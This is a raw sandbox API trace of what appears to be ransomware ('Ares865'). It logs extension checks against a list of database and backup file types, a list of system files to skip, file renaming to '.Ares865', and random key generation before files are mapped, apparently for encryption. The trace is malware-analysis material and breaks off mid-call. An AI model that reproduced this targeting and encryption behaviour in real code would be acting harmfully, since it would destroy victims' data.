[0065.379] lstrlenW (lpString="frm") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0065.379] lstrlenW (lpString="gdb") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.379] lstrlenW (lpString="gdb") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.379] lstrlenW (lpString="grdb") returned 4 [0065.379] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0065.379] lstrlenW (lpString="gwi") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0065.379] lstrlenW (lpString="hdb") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0065.379] lstrlenW (lpString="his") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0065.379] lstrlenW (lpString="ib") returned 2 [0065.379] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0065.379] lstrlenW (lpString="idb") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0065.379] lstrlenW (lpString="ihx") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0065.380] lstrlenW (lpString="itdb") returned 4 [0065.380] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0065.380] lstrlenW (lpString="itw") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0065.380] lstrlenW (lpString="jet") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0065.380] lstrlenW (lpString="jtx") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0065.380] lstrlenW (lpString="kdb") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0065.380] lstrlenW (lpString="kexi") returned 4 [0065.380] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0065.380] lstrlenW (lpString="kexic") returned 5 [0065.380] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0065.380] lstrlenW (lpString="kexis") returned 5 [0065.380] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0065.380] lstrlenW (lpString="lgc") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0065.380] lstrlenW (lpString="lwx") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0065.380] lstrlenW (lpString="maf") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0065.380] lstrlenW (lpString="maq") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0065.380] lstrlenW (lpString="mar") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0065.380] lstrlenW (lpString="marshal") returned 7 [0065.380] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0065.380] lstrlenW (lpString="mas") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0065.380] lstrlenW (lpString="mav") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0065.380] lstrlenW (lpString="maw") returned 3 [0065.380] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0065.381] lstrlenW (lpString="mdbhtml") returned 7 [0065.381] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0065.381] lstrlenW (lpString="mdn") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0065.381] lstrlenW (lpString="mdt") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0065.381] lstrlenW (lpString="mfd") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0065.381] lstrlenW (lpString="mpd") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0065.381] lstrlenW (lpString="mrg") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0065.381] lstrlenW (lpString="mud") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0065.381] lstrlenW (lpString="mwb") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0065.381] lstrlenW (lpString="myd") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0065.381] lstrlenW (lpString="ndf") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0065.381] lstrlenW (lpString="nnt") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0065.381] lstrlenW (lpString="nrmlib") returned 6 [0065.381] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0065.381] lstrlenW (lpString="ns2") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0065.381] lstrlenW (lpString="ns3") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0065.381] lstrlenW (lpString="ns4") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0065.381] lstrlenW (lpString="nsf") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0065.381] lstrlenW (lpString="nv") returned 2 [0065.381] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0065.381] lstrlenW (lpString="nv2") returned 3 [0065.381] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0065.382] lstrlenW (lpString="nwdb") returned 4 [0065.382] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0065.382] lstrlenW (lpString="nyf") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0065.382] lstrlenW (lpString="odb") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.382] lstrlenW (lpString="odb") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.382] lstrlenW (lpString="oqy") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0065.382] lstrlenW (lpString="ora") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0065.382] lstrlenW (lpString="orx") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0065.382] lstrlenW (lpString="owc") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0065.382] lstrlenW (lpString="p96") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0065.382] lstrlenW (lpString="p97") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0065.382] lstrlenW (lpString="pan") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0065.382] lstrlenW (lpString="pdb") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0065.382] lstrlenW (lpString="pdm") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0065.382] lstrlenW (lpString="pnz") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0065.382] lstrlenW (lpString="qry") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0065.382] lstrlenW (lpString="qvd") returned 3 [0065.382] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0065.383] lstrlenW (lpString="rbf") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0065.383] lstrlenW (lpString="rctd") returned 4 [0065.383] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0065.383] lstrlenW (lpString="rod") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0065.383] lstrlenW (lpString="rodx") returned 4 [0065.383] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0065.383] lstrlenW (lpString="rpd") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0065.383] lstrlenW (lpString="rsd") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0065.383] lstrlenW (lpString="sas7bdat") returned 8 [0065.383] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0065.383] lstrlenW (lpString="sbf") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0065.383] lstrlenW (lpString="scx") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0065.383] lstrlenW (lpString="sdb") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0065.383] lstrlenW (lpString="sdc") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0065.383] lstrlenW (lpString="sdf") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0065.383] lstrlenW (lpString="sis") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0065.383] lstrlenW (lpString="spq") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0065.383] lstrlenW (lpString="te") returned 2 [0065.383] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0065.383] lstrlenW (lpString="teacher") returned 7 [0065.383] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0065.383] lstrlenW (lpString="tmd") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0065.383] lstrlenW (lpString="tps") returned 3 [0065.383] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0065.383] lstrlenW (lpString="trc") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.384] lstrlenW (lpString="trc") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.384] lstrlenW (lpString="trm") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0065.384] lstrlenW (lpString="udb") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0065.384] lstrlenW (lpString="udl") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0065.384] lstrlenW (lpString="usr") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0065.384] lstrlenW (lpString="v12") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0065.384] lstrlenW (lpString="vis") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0065.384] lstrlenW (lpString="vpd") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0065.384] lstrlenW (lpString="vvv") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0065.384] lstrlenW (lpString="wdb") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0065.384] lstrlenW (lpString="wmdb") returned 4 [0065.384] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0065.384] lstrlenW (lpString="wrk") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0065.384] lstrlenW (lpString="xdb") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0065.384] lstrlenW (lpString="xld") returned 3 [0065.384] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0065.384] lstrlenW (lpString="xmlff") returned 5 [0065.384] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0065.384] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.Ares865") returned 87 [0065.384] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0065.387] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.387] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0065.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.387] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.388] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.388] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.388] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x118 [0065.390] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0065.391] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.392] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.393] CloseHandle (hObject=0x118) returned 1 [0065.393] CloseHandle (hObject=0x164) returned 1 [0065.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.393] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfee8082e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="aoldtz.exe") returned 1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2=".") returned 1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="..") returned 1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="windows") returned -1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="bootmgr") returned 1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="temp") returned -1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="pagefile.sys") returned -1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="boot") returned 1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="ids.txt") returned -1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="ntuser.dat") returned -1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="perflogs") returned -1 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2="MSBuild") returned -1 [0065.393] lstrlenW (lpString="fwlink[1]") returned 9 [0065.393] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 79 [0065.393] lstrcpyW (in: lpString1=0x2cce488, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0065.393] lstrlenW (lpString="fwlink[1]") returned 9 [0065.393] lstrlenW (lpString="Ares865") returned 7 [0065.393] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0065.393] lstrlenW (lpString=".dll") returned 4 [0065.393] lstrcmpiW (lpString1="fwlink[1]", lpString2=".dll") returned 1 [0065.393] lstrlenW (lpString=".lnk") returned 4 [0065.394] lstrcmpiW (lpString1="fwlink[1]", lpString2=".lnk") returned 1 [0065.394] lstrlenW (lpString=".ini") returned 4 [0065.394] lstrcmpiW (lpString1="fwlink[1]", lpString2=".ini") returned 1 [0065.394] lstrlenW (lpString=".sys") returned 4 [0065.394] lstrcmpiW (lpString1="fwlink[1]", lpString2=".sys") returned 1 [0065.394] lstrlenW (lpString="fwlink[1]") returned 9 [0065.394] lstrlenW (lpString="bak") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="bak") returned -1 [0065.394] lstrlenW (lpString="ba_") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="ba_") returned -1 [0065.394] lstrlenW (lpString="dbb") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="dbb") returned -1 [0065.394] lstrlenW (lpString="vmdk") returned 4 [0065.394] lstrcmpiW (lpString1="k[1]", lpString2="vmdk") returned -1 [0065.394] lstrlenW (lpString="rar") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="rar") returned -1 [0065.394] lstrlenW (lpString="zip") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="zip") returned -1 [0065.394] lstrlenW (lpString="tgz") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="tgz") returned -1 [0065.394] lstrlenW (lpString="vbox") returned 4 [0065.394] lstrcmpiW (lpString1="k[1]", lpString2="vbox") returned -1 [0065.394] lstrlenW (lpString="vdi") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="vdi") returned -1 [0065.394] lstrlenW (lpString="vhd") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="vhd") returned -1 [0065.394] lstrlenW (lpString="vhdx") returned 4 [0065.394] lstrcmpiW (lpString1="k[1]", lpString2="vhdx") returned -1 [0065.394] lstrlenW (lpString="avhd") returned 4 [0065.394] lstrcmpiW (lpString1="k[1]", lpString2="avhd") returned 1 [0065.394] lstrlenW (lpString="db") returned 2 [0065.394] lstrcmpiW (lpString1="1]", lpString2="db") returned -1 [0065.394] lstrlenW (lpString="db2") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="db2") returned -1 [0065.394] lstrlenW (lpString="db3") returned 3 [0065.394] lstrcmpiW (lpString1="[1]", lpString2="db3") returned -1 [0065.395] lstrlenW (lpString="dbf") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="dbf") returned -1 [0065.395] lstrlenW (lpString="mdf") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="mdf") returned -1 [0065.395] lstrlenW (lpString="mdb") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="mdb") returned -1 [0065.395] lstrlenW (lpString="sql") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="sql") returned -1 [0065.395] lstrlenW (lpString="sqlite") returned 6 [0065.395] lstrcmpiW (lpString1="ink[1]", lpString2="sqlite") returned -1 [0065.395] lstrlenW (lpString="sqlite3") returned 7 [0065.395] lstrcmpiW (lpString1="link[1]", lpString2="sqlite3") returned -1 [0065.395] lstrlenW (lpString="sqlitedb") returned 8 [0065.395] lstrcmpiW (lpString1="wlink[1]", lpString2="sqlitedb") returned 1 [0065.395] lstrlenW (lpString="xml") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="xml") returned -1 [0065.395] lstrlenW (lpString="$er") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="$er") returned 1 [0065.395] lstrlenW (lpString="4dd") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="4dd") returned -1 [0065.395] lstrlenW (lpString="4dl") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="4dl") returned -1 [0065.395] lstrlenW (lpString="^^^") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="^^^") returned -1 [0065.395] lstrlenW (lpString="abs") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="abs") returned -1 [0065.395] lstrlenW (lpString="abx") returned 3 [0065.395] lstrcmpiW (lpString1="[1]", lpString2="abx") returned -1 [0065.395] lstrlenW (lpString="accdb") returned 5 [0065.395] lstrcmpiW (lpString1="nk[1]", lpString2="accdb") returned 1 [0065.395] lstrlenW (lpString="accdc") returned 5 [0065.395] lstrcmpiW (lpString1="nk[1]", lpString2="accdc") returned 1 [0065.395] lstrlenW (lpString="accde") returned 5 [0065.395] lstrcmpiW (lpString1="nk[1]", lpString2="accde") returned 1 [0065.395] lstrlenW (lpString="accdr") returned 5 [0065.395] lstrcmpiW (lpString1="nk[1]", lpString2="accdr") returned 1 [0065.395] lstrlenW (lpString="accdt") returned 5 [0065.396] lstrcmpiW (lpString1="nk[1]", lpString2="accdt") returned 1 [0065.396] lstrlenW (lpString="accdw") returned 5 [0065.396] lstrcmpiW (lpString1="nk[1]", lpString2="accdw") returned 1 [0065.396] lstrlenW (lpString="accft") returned 5 [0065.396] lstrcmpiW (lpString1="nk[1]", lpString2="accft") returned 1 [0065.396] lstrlenW (lpString="adb") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="adb") returned -1 [0065.396] lstrlenW (lpString="adb") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="adb") returned -1 [0065.396] lstrlenW (lpString="ade") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="ade") returned -1 [0065.396] lstrlenW (lpString="adf") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="adf") returned -1 [0065.396] lstrlenW (lpString="adn") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="adn") returned -1 [0065.396] lstrlenW (lpString="adp") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="adp") returned -1 [0065.396] lstrlenW (lpString="alf") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="alf") returned -1 [0065.396] lstrlenW (lpString="ask") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="ask") returned -1 [0065.396] lstrlenW (lpString="btr") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="btr") returned -1 [0065.396] lstrlenW (lpString="cat") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="cat") returned -1 [0065.396] lstrlenW (lpString="cdb") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="cdb") returned -1 [0065.396] lstrlenW (lpString="ckp") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="ckp") returned -1 [0065.396] lstrlenW (lpString="cma") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="cma") returned -1 [0065.396] lstrlenW (lpString="cpd") returned 3 [0065.396] lstrcmpiW (lpString1="[1]", lpString2="cpd") returned -1 [0065.396] lstrlenW (lpString="dacpac") returned 6 [0065.396] lstrcmpiW (lpString1="ink[1]", lpString2="dacpac") returned 1 [0065.396] lstrlenW (lpString="dad") returned 3 [0065.397] lstrcmpiW (lpString1="[1]", lpString2="dad") returned -1 [0065.397] lstrlenW (lpString="dadiagrams") returned 10 [0065.397] lstrlenW (lpString="daschema") returned 8 [0065.397] lstrcmpiW (lpString1="wlink[1]", lpString2="daschema") returned 1 [0065.397] lstrlenW (lpString="db-journal") returned 10 [0065.397] lstrlenW (lpString="db-shm") returned 6 [0065.397] lstrcmpiW (lpString1="ink[1]", lpString2="db-shm") returned 1 [0065.397] lstrlenW (lpString="db-wal") returned 6 [0065.397] lstrcmpiW (lpString1="ink[1]", lpString2="db-wal") returned 1 [0065.397] lstrlenW (lpString="dbc") returned 3 [0065.397] lstrcmpiW (lpString1="[1]", lpString2="dbc") returned -1 [0065.397] lstrlenW (lpString="dbs") returned 3 [0065.397] lstrcmpiW (lpString1="[1]", lpString2="dbs") returned -1 [0065.397] lstrlenW (lpString="dbt") returned 3 [0065.397] lstrcmpiW (lpString1="[1]", lpString2="dbt") returned -1 [0065.397] lstrlenW (lpString="dbv") returned 3 [0065.397] lstrcmpiW (lpString1="[1]", lpString2="dbv") returned -1 [0065.397] lstrlenW (lpString="dbx") returned 3 [0065.397] lstrcmpiW (lpString1="[1]", lpString2="dbx") returned -1 [0065.397] lstrlenW (lpString="dcb") returned 3 [0065.397] lstrcmpiW (lpString1="[1]", lpString2="dcb") returned -1 [0065.397] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].Ares865") returned 85 [0065.397] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].ares865"), dwFlags=0x1) returned 1 [0065.398] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.398] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0065.398] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0065.398] CloseHandle (hObject=0x0) returned 0 [0065.398] CloseHandle (hObject=0x164) returned 1 [0065.398] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac2c9c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.398] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.398] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | 